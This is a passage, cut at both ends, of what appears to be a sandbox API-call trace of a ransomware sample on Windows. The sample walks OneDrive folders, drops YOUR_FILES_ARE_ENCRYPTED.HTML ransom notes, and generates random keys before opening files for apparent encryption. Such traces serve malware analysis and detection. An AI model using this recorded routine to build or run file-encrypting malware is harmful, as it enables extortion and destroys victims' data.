ftLastAccessTime.dwLowDateTime=0x56fbfa3c, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x57438001, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x1c951e4, cFileName="..", cAlternateFileName="")) returned 1 [0113.049] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x57438001, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x57438001, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5783de52, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x15ac0, dwReserved0=0x19e010, dwReserved1=0x1c951e4, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.049] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.049] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\mn\\FileSync.LocalizedResources.dll.mui") returned 114 [0113.049] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.049] lstrlenW (lpString=".mui") returned 4 [0113.049] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.049] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x57438001, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x57438001, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5783de52, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x15ac0, dwReserved0=0x19e010, dwReserved1=0x1c951e4, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.050] FindClose (in: hFindFile=0x626878 | out: hFindFile=0x626878) returned 1 [0113.050] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\mn\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0113.050] GetProcessHeap () returned 0x600000 [0113.050] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315d190 [0113.050] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\mn\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_3\\mn\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0113.050] WriteFile (in: hFile=0x32c, lpBuffer=0x315d190*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x315d190*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.053] CloseHandle (hObject=0x32c) returned 1 [0113.053] GetProcessHeap () returned 0x600000 [0113.053] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315d190 | out: hHeap=0x600000) returned 1 [0113.053] GetProcessHeap () returned 0x600000 [0113.053] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0113.053] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x57a07ba6, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x57a07ba6, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x57a07ba6, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="mr", cAlternateFileName="")) returned 1 [0113.053] StrStrIW (lpFirst="mr", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.054] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\mr") returned 78 [0113.054] GetProcessHeap () returned 0x600000 [0113.054] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30a0048 [0113.054] lstrcpyW (in: lpString1=0x30a0048, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\mr" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\mr") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\mr" [0113.054] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\mr", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\mr\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\mr\\*" [0113.054] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\mr\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x57a07ba6, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x57a07ba6, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x58a9209a, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x1c951e4, cFileName=".", cAlternateFileName="")) returned 0x626638 [0113.054] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x57a07ba6, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x57a07ba6, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x58a9209a, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x1c951e4, cFileName="..", cAlternateFileName="")) returned 1 [0113.054] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58a9209a, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x58a9209a, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5acd7b5a, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x15cc0, dwReserved0=0x19e010, dwReserved1=0x1c951e4, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.054] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.054] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\mr\\FileSync.LocalizedResources.dll.mui") returned 114 [0113.054] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.054] lstrlenW (lpString=".mui") returned 4 [0113.054] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.054] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58a9209a, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x58a9209a, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5acd7b5a, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x15cc0, dwReserved0=0x19e010, dwReserved1=0x1c951e4, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.054] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0113.054] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\mr\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0113.054] GetProcessHeap () returned 0x600000 [0113.054] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315d190 [0113.054] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\mr\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_3\\mr\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0113.055] WriteFile (in: hFile=0x32c, lpBuffer=0x315d190*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x315d190*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.056] CloseHandle (hObject=0x32c) returned 1 [0113.056] GetProcessHeap () returned 0x600000 [0113.056] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315d190 | out: hHeap=0x600000) returned 1 [0113.056] GetProcessHeap () returned 0x600000 [0113.056] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0113.057] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5b3b2896, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5b3b2896, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5b3b2896, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="ms", cAlternateFileName="")) returned 1 [0113.057] StrStrIW (lpFirst="ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.057] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ms") returned 78 [0113.057] GetProcessHeap () returned 0x600000 [0113.057] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30a0048 [0113.058] lstrcpyW (in: lpString1=0x30a0048, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ms" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ms") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ms" [0113.058] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ms", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ms\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ms\\*" [0113.058] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ms\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5b3b2896, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5b3b2896, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5bdd475a, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x1c951e4, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0113.060] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5b3b2896, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5b3b2896, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5bdd475a, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x1c951e4, cFileName="..", cAlternateFileName="")) returned 1 [0113.063] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5bdd475a, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5bdd475a, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5cb63e92, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x15cc0, dwReserved0=0x19e010, dwReserved1=0x1c951e4, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.063] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.063] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ms\\FileSync.LocalizedResources.dll.mui") returned 114 [0113.063] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.063] lstrlenW (lpString=".mui") returned 4 [0113.063] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.064] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5bdd475a, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5bdd475a, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5cb63e92, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x15cc0, dwReserved0=0x19e010, dwReserved1=0x1c951e4, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.064] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0113.064] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ms\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0113.064] GetProcessHeap () returned 0x600000 [0113.064] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315d190 [0113.067] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ms\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_3\\ms\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0113.068] WriteFile (in: hFile=0x324, lpBuffer=0x315d190*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x315d190*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.069] CloseHandle (hObject=0x324) returned 1 [0113.069] GetProcessHeap () returned 0x600000 [0113.069] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315d190 | out: hHeap=0x600000) returned 1 [0113.069] GetProcessHeap () returned 0x600000 [0113.069] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0113.071] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51336474, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x51336474, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x514da01f, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x6f2a0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="msvcp120.dll", cAlternateFileName="")) returned 1 [0113.071] StrStrIW (lpFirst="msvcp120.dll", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.071] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\msvcp120.dll") returned 88 [0113.071] PathFindExtensionW (pszPath="msvcp120.dll") returned=".dll" [0113.071] lstrlenW (lpString=".dll") returned 4 [0113.071] PathFindExtensionW (pszPath="msvcp120.dll") returned=".dll" [0113.071] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0113.071] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\msvcp120.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_3\\msvcp120.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x324 [0113.071] GetFileSizeEx (in: hFile=0x324, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=455328) returned 1 [0113.071] GetProcessHeap () returned 0x600000 [0113.071] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30f2fc0 [0113.073] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="F5") returned 2 [0113.073] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="A4") returned 2 [0113.074] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="7B") returned 2 [0113.074] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="81") returned 2 [0113.074] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="3A") returned 2 [0113.074] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="03") returned 2 [0113.074] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="38") returned 2 [0113.074] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="43") returned 2 [0113.074] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="D3") returned 2 [0113.074] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="30") returned 2 [0113.074] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="22") returned 2 [0113.074] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="58") returned 2 [0113.074] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="13") returned 2 [0113.074] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="BF") returned 2 [0113.074] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="22") returned 2 [0113.074] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="18") returned 2 [0113.074] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="75") returned 2 [0113.074] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="12") returned 2 [0113.074] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="C5") returned 2 [0113.074] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="35") returned 2 [0113.074] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="36") returned 2 [0113.074] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="DE") returned 2 [0113.074] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="2D") returned 2 [0113.074] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="20") returned 2 [0113.074] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="7E") returned 2 [0113.074] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="C8") returned 2 [0113.074] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="59") returned 2 [0113.074] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="9C") returned 2 [0113.074] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="CA") returned 2 [0113.074] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="67") returned 2 [0113.074] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="11") returned 2 [0113.074] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="62") returned 2 [0113.075] lstrcpyW (in: lpString1=0x3103074, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\msvcp120.dll" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\msvcp120.dll") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\msvcp120.dll" [0113.075] CreateIoCompletionPort (FileHandle=0x324, ExistingCompletionPort=0x274, CompletionKey=0x30f2fc0, NumberOfConcurrentThreads=0x0) returned 0x274 [0113.075] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30f2fc0, lpOverlapped=0x30f2fc0) returned 1 [0113.075] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51598aff, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x51598aff, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x51788816, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0xed0a0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="msvcr120.dll", cAlternateFileName="")) returned 1 [0113.075] StrStrIW (lpFirst="msvcr120.dll", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.075] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\msvcr120.dll") returned 88 [0113.075] PathFindExtensionW (pszPath="msvcr120.dll") returned=".dll" [0113.075] lstrlenW (lpString=".dll") returned 4 [0113.075] PathFindExtensionW (pszPath="msvcr120.dll") returned=".dll" [0113.076] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0113.076] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\msvcr120.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_3\\msvcr120.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x32c [0113.077] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=970912) returned 1 [0113.077] GetProcessHeap () returned 0x600000 [0113.077] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30a0048 [0113.081] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="DB") returned 2 [0113.081] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="90") returned 2 [0113.081] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="C0") returned 2 [0113.081] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="42") returned 2 [0113.081] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="9C") returned 2 [0113.081] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="C0") returned 2 [0113.081] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="2D") returned 2 [0113.081] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="50") returned 2 [0113.081] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="9E") returned 2 [0113.081] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="AC") returned 2 [0113.082] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="F7") returned 2 [0113.082] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="11") returned 2 [0113.082] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="AA") returned 2 [0113.082] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="7F") returned 2 [0113.082] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="88") returned 2 [0113.082] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="D4") returned 2 [0113.082] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="47") returned 2 [0113.082] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="B9") returned 2 [0113.082] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="61") returned 2 [0113.082] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="7E") returned 2 [0113.082] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="F5") returned 2 [0113.082] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="23") returned 2 [0113.082] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="4D") returned 2 [0113.082] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="56") returned 2 [0113.082] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="BA") returned 2 [0113.082] wsprintfW (in: param_1=0x19e10e, 